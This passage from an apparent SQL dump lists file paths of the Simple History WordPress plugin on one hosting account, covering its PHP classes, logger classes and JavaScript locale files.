ontent/plugins/simple-history/inc/event-details/class-event-details-item-formatter.php'),(9989,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/event-details/class-event-details-item-raw-formatter.php','wp-content/plugins/simple-history/inc/event-details/class-event-details-item-raw-formatter.php'),(9990,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/event-details/class-event-details-item-table-row-formatter.php','wp-content/plugins/simple-history/inc/event-details/class-event-details-item-table-row-formatter.php'),(9991,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/event-details/class-event-details-item-table-row-raw-formatter.php','wp-content/plugins/simple-history/inc/event-details/class-event-details-item-table-row-raw-formatter.php'),(9992,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/event-details/class-event-details-item.php','wp-content/plugins/simple-history/inc/event-details/class-event-details-item.php'),(9993,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/event-details/class-event-details-simple-container.php','wp-content/plugins/simple-history/inc/event-details/class-event-details-simple-container.php'),(9994,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/event-details/interface-event-details-container-interface.php','wp-content/plugins/simple-history/inc/event-details/interface-event-details-container-interface.php'),(9995,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/global-helpers.php','wp-content/plugins/simple-history/inc/global-helpers.php'),(9996,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/oldversions.php','wp-content/plugins/simple-history/inc/oldversions.php'),(9997,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/services/class-addons-licences.php','wp-content/plugins/simple-history/inc/services/class-addons-licences.php'),(9998,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/services/class-admin-pages.php','wp-content/plugins/simple-history/inc/services/class-admin-pages.php'),(9999,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/services/class-api.php','wp-content/plugins/simple-history/inc/services/class-api.php'),(10000,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/services/class-dashboard-widget.php','wp-content/plugins/simple-history/inc/services/class-dashboard-widget.php'),(10001,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/services/class-dropins-loader.php','wp-content/plugins/simple-history/inc/services/class-dropins-loader.php'),(10002,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/services/class-language-loader.php','wp-content/plugins/simple-history/inc/services/class-language-loader.php'),(10003,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/services/class-licences-settings-page.php','wp-content/plugins/simple-history/inc/services/class-licences-settings-page.php'),(10004,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/services/class-loggers-loader.php','wp-content/plugins/simple-history/inc/services/class-loggers-loader.php'),(10005,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/services/class-network-menu-items.php','wp-content/plugins/simple-history/inc/services/class-network-menu-items.php'),(10006,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/services/class-plugin-list-info.php','wp-content/plugins/simple-history/inc/services/class-plugin-list-info.php'),(10007,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/services/class-plugin-list-link.php','wp-content/plugins/simple-history/inc/services/class-plugin-list-link.php'),(10008,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/services/class-scripts-and-templates.php','wp-content/plugins/simple-history/inc/services/class-scripts-and-templates.php'),(10009,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/services/class-service.php','wp-content/plugins/simple-history/inc/services/class-service.php'),(10010,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/services/class-setup-database.php','wp-content/plugins/simple-history/inc/services/class-setup-database.php'),(10011,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/services/class-setup-log-filters.php','wp-content/plugins/simple-history/inc/services/class-setup-log-filters.php'),(10012,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/services/class-setup-pause-resume-actions.php','wp-content/plugins/simple-history/inc/services/class-setup-pause-resume-actions.php'),(10013,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/services/class-setup-purge-db-cron.php','wp-content/plugins/simple-history/inc/services/class-setup-purge-db-cron.php'),(10014,'/home/eckank5/public_html/wp-content/plugins/simple-history/inc/services/class-setup-settings-page.php','wp-content/plugins/simple-history/inc/services/class-setup-settings-page.php'),(10015,'/home/eckank5/public_html/wp-content/plugins/simple-history/index.php','wp-content/plugins/simple-history/index.php'),(10016,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/chart.4.3.0.min.js','wp-content/plugins/simple-history/js/chart.4.3.0.min.js'),(10017,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/scripts.js','wp-content/plugins/simple-history/js/scripts.js'),(10018,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/af.js','wp-content/plugins/simple-history/js/select2/i18n/af.js'),(10019,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/ar.js','wp-content/plugins/simple-history/js/select2/i18n/ar.js'),(10020,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/az.js','wp-content/plugins/simple-history/js/select2/i18n/az.js'),(10021,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/bg.js','wp-content/plugins/simple-history/js/select2/i18n/bg.js'),(10022,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/bs.js','wp-content/plugins/simple-history/js/select2/i18n/bs.js'),(10023,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/ca.js','wp-content/plugins/simple-history/js/select2/i18n/ca.js'),(10024,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/cs.js','wp-content/plugins/simple-history/js/select2/i18n/cs.js'),(10025,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/da.js','wp-content/plugins/simple-history/js/select2/i18n/da.js'),(10026,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/de.js','wp-content/plugins/simple-history/js/select2/i18n/de.js'),(10027,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/dsb.js','wp-content/plugins/simple-history/js/select2/i18n/dsb.js'),(10028,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/el.js','wp-content/plugins/simple-history/js/select2/i18n/el.js'),(10029,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/en.js','wp-content/plugins/simple-history/js/select2/i18n/en.js'),(10030,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/es.js','wp-content/plugins/simple-history/js/select2/i18n/es.js'),(10031,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/et.js','wp-content/plugins/simple-history/js/select2/i18n/et.js'),(10032,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/eu.js','wp-content/plugins/simple-history/js/select2/i18n/eu.js'),(10033,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/fa.js','wp-content/plugins/simple-history/js/select2/i18n/fa.js'),(10034,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/fi.js','wp-content/plugins/simple-history/js/select2/i18n/fi.js'),(10035,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/fr.js','wp-content/plugins/simple-history/js/select2/i18n/fr.js'),(10036,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/gl.js','wp-content/plugins/simple-history/js/select2/i18n/gl.js'),(10037,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/he.js','wp-content/plugins/simple-history/js/select2/i18n/he.js'),(10038,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/hi.js','wp-content/plugins/simple-history/js/select2/i18n/hi.js'),(10039,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/hr.js','wp-content/plugins/simple-history/js/select2/i18n/hr.js'),(10040,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/hsb.js','wp-content/plugins/simple-history/js/select2/i18n/hsb.js'),(10041,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/hu.js','wp-content/plugins/simple-history/js/select2/i18n/hu.js'),(10042,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/hy.js','wp-content/plugins/simple-history/js/select2/i18n/hy.js'),(10043,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/id.js','wp-content/plugins/simple-history/js/select2/i18n/id.js'),(10044,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/is.js','wp-content/plugins/simple-history/js/select2/i18n/is.js'),(10045,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/it.js','wp-content/plugins/simple-history/js/select2/i18n/it.js'),(10046,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/ja.js','wp-content/plugins/simple-history/js/select2/i18n/ja.js'),(10047,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/km.js','wp-content/plugins/simple-history/js/select2/i18n/km.js'),(10048,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/ko.js','wp-content/plugins/simple-history/js/select2/i18n/ko.js'),(10049,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/lt.js','wp-content/plugins/simple-history/js/select2/i18n/lt.js'),(10050,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/lv.js','wp-content/plugins/simple-history/js/select2/i18n/lv.js'),(10051,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/mk.js','wp-content/plugins/simple-history/js/select2/i18n/mk.js'),(10052,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/ms.js','wp-content/plugins/simple-history/js/select2/i18n/ms.js'),(10053,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/nb.js','wp-content/plugins/simple-history/js/select2/i18n/nb.js'),(10054,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/nl.js','wp-content/plugins/simple-history/js/select2/i18n/nl.js'),(10055,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/pl.js','wp-content/plugins/simple-history/js/select2/i18n/pl.js'),(10056,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/ps.js','wp-content/plugins/simple-history/js/select2/i18n/ps.js'),(10057,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/pt-BR.js','wp-content/plugins/simple-history/js/select2/i18n/pt-BR.js'),(10058,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/pt.js','wp-content/plugins/simple-history/js/select2/i18n/pt.js'),(10059,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/ro.js','wp-content/plugins/simple-history/js/select2/i18n/ro.js'),(10060,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/ru.js','wp-content/plugins/simple-history/js/select2/i18n/ru.js'),(10061,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/sk.js','wp-content/plugins/simple-history/js/select2/i18n/sk.js'),(10062,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/sl.js','wp-content/plugins/simple-history/js/select2/i18n/sl.js'),(10063,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/sr-Cyrl.js','wp-content/plugins/simple-history/js/select2/i18n/sr-Cyrl.js'),(10064,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/sr.js','wp-content/plugins/simple-history/js/select2/i18n/sr.js'),(10065,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/sv.js','wp-content/plugins/simple-history/js/select2/i18n/sv.js'),(10066,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/th.js','wp-content/plugins/simple-history/js/select2/i18n/th.js'),(10067,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/tr.js','wp-content/plugins/simple-history/js/select2/i18n/tr.js'),(10068,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/uk.js','wp-content/plugins/simple-history/js/select2/i18n/uk.js'),(10069,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/vi.js','wp-content/plugins/simple-history/js/select2/i18n/vi.js'),(10070,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/zh-CN.js','wp-content/plugins/simple-history/js/select2/i18n/zh-CN.js'),(10071,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/i18n/zh-TW.js','wp-content/plugins/simple-history/js/select2/i18n/zh-TW.js'),(10072,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/select2.full.min.js','wp-content/plugins/simple-history/js/select2/select2.full.min.js'),(10073,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/select2.min.css','wp-content/plugins/simple-history/js/select2/select2.min.css'),(10074,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/select2/select2.min.js','wp-content/plugins/simple-history/js/select2/select2.min.js'),(10075,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/jquery.timeago.js','wp-content/plugins/simple-history/js/timeago/jquery.timeago.js'),(10076,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.af.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.af.js'),(10077,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.am.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.am.js'),(10078,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.ar.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.ar.js'),(10079,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.az-short.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.az-short.js'),(10080,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.az.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.az.js'),(10081,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.be.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.be.js'),(10082,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.bg.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.bg.js'),(10083,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.bs.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.bs.js'),(10084,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.ca.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.ca.js'),(10085,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.cs.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.cs.js'),(10086,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.cy.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.cy.js'),(10087,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.da.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.da.js'),(10088,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.de-short.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.de-short.js'),(10089,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.de.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.de.js'),(10090,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.dv.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.dv.js'),(10091,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.el.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.el.js'),(10092,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.en-short.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.en-short.js'),(10093,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.en.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.en.js'),(10094,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.es-short.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.es-short.js'),(10095,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.es.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.es.js'),(10096,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.et.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.et.js'),(10097,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.eu.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.eu.js'),(10098,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.fa-short.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.fa-short.js'),(10099,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.fa.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.fa.js'),(10100,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.fi.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.fi.js'),(10101,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.fr-short.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.fr-short.js'),(10102,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.fr.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.fr.js'),(10103,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.gl.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.gl.js'),(10104,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.he.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.he.js'),(10105,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.hr.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.hr.js'),(10106,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.hu.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.hu.js'),(10107,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.hy.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.hy.js'),(10108,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.id.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.id.js'),(10109,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.is.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.is.js'),(10110,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.it-short.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.it-short.js'),(10111,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.it.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.it.js'),(10112,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.ja.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.ja.js'),(10113,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.jv.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.jv.js'),(10114,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.ko.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.ko.js'),(10115,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.ky.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.ky.js'),(10116,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.lt.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.lt.js'),(10117,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.lv.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.lv.js'),(10118,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.mk.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.mk.js'),(10119,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.nl.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.nl.js'),(10120,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.no.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.no.js'),(10121,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.pl.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.pl.js'),(10122,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.pt-br-short.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.pt-br-short.js'),(10123,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.pt-br.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.pt-br.js'),(10124,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.pt-short.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.pt-short.js'),(10125,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.pt.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.pt.js'),(10126,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.ro.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.ro.js'),(10127,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.rs.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.rs.js'),(10128,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.ru.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.ru.js'),(10129,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.rw.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.rw.js'),(10130,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.si.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.si.js'),(10131,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.sk.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.sk.js'),(10132,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.sl.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.sl.js'),(10133,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.sq.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.sq.js'),(10134,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.sr.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.sr.js'),(10135,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.sv.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.sv.js'),(10136,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.th.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.th.js'),(10137,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.tr-short.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.tr-short.js'),(10138,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.tr.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.tr.js'),(10139,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.uk.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.uk.js'),(10140,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.ur.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.ur.js'),(10141,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.uz.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.uz.js'),(10142,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.vi.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.vi.js'),(10143,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.zh-CN.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.zh-CN.js'),(10144,'/home/eckank5/public_html/wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.zh-TW.js','wp-content/plugins/simple-history/js/timeago/locales/jquery.timeago.zh-TW.js'),(10145,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-available-updates-logger.php','wp-content/plugins/simple-history/loggers/class-available-updates-logger.php'),(10146,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-categories-logger.php','wp-content/plugins/simple-history/loggers/class-categories-logger.php'),(10147,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-comments-logger.php','wp-content/plugins/simple-history/loggers/class-comments-logger.php'),(10148,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-core-updates-logger.php','wp-content/plugins/simple-history/loggers/class-core-updates-logger.php'),(10149,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-export-logger.php','wp-content/plugins/simple-history/loggers/class-export-logger.php'),(10150,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-file-edits-logger.php','wp-content/plugins/simple-history/loggers/class-file-edits-logger.php'),(10151,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-logger.php','wp-content/plugins/simple-history/loggers/class-logger.php'),(10152,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-media-logger.php','wp-content/plugins/simple-history/loggers/class-media-logger.php'),(10153,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-menu-logger.php','wp-content/plugins/simple-history/loggers/class-menu-logger.php'),(10154,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-options-logger.php','wp-content/plugins/simple-history/loggers/class-options-logger.php'),(10155,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-plugin-acf-logger.php','wp-content/plugins/simple-history/loggers/class-plugin-acf-logger.php'),(10156,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-plugin-beaver-builder-logger.php','wp-content/plugins/simple-history/loggers/class-plugin-beaver-builder-logger.php'),(10157,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-plugin-duplicate-post-logger.php','wp-content/plugins/simple-history/loggers/class-plugin-duplicate-post-logger.php'),(10158,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-plugin-enable-media-replace-logger.php','wp-content/plugins/simple-history/loggers/class-plugin-enable-media-replace-logger.php'),(10159,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-plugin-jetpack-logger.php','wp-content/plugins/simple-history/loggers/class-plugin-jetpack-logger.php'),(10160,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-plugin-limit-login-attempts-logger.php','wp-content/plugins/simple-history/loggers/class-plugin-limit-login-attempts-logger.php'),(10161,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-plugin-logger.php','wp-content/plugins/simple-history/loggers/class-plugin-logger.php'),(10162,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-plugin-redirection-logger.php','wp-content/plugins/simple-history/loggers/class-plugin-redirection-logger.php'),(10163,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-plugin-user-switching-logger.php','wp-content/plugins/simple-history/loggers/class-plugin-user-switching-logger.php'),(10164,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-plugin-wp-crontrol-logger.php','wp-content/plugins/simple-history/loggers/class-plugin-wp-crontrol-logger.php'),(10165,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-post-logger.php','wp-content/plugins/simple-history/loggers/class-post-logger.php'),(10166,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-privacy-logger.php','wp-content/plugins/simple-history/loggers/class-privacy-logger.php'),(10167,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-simple-history-logger.php','wp-content/plugins/simple-history/loggers/class-simple-history-logger.php'),(10168,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-simple-logger.php','wp-content/plugins/simple-history/loggers/class-simple-logger.php'),(10169,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-theme-logger.php','wp-content/plugins/simple-history/loggers/class-theme-logger.php'),(10170,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-translations-logger.php','wp-content/plugins/simple-history/loggers/class-translations-logger.php'),(10171,'/home/eckank5/public_html/wp-content/plugins/simple-history/loggers/class-user-logger.php','wp-content/plugins/simple-history/loggers/class-user-logger.php'),(10172,'/home/eckank5/public_html/wp-content/plugins/simple-history/readme.t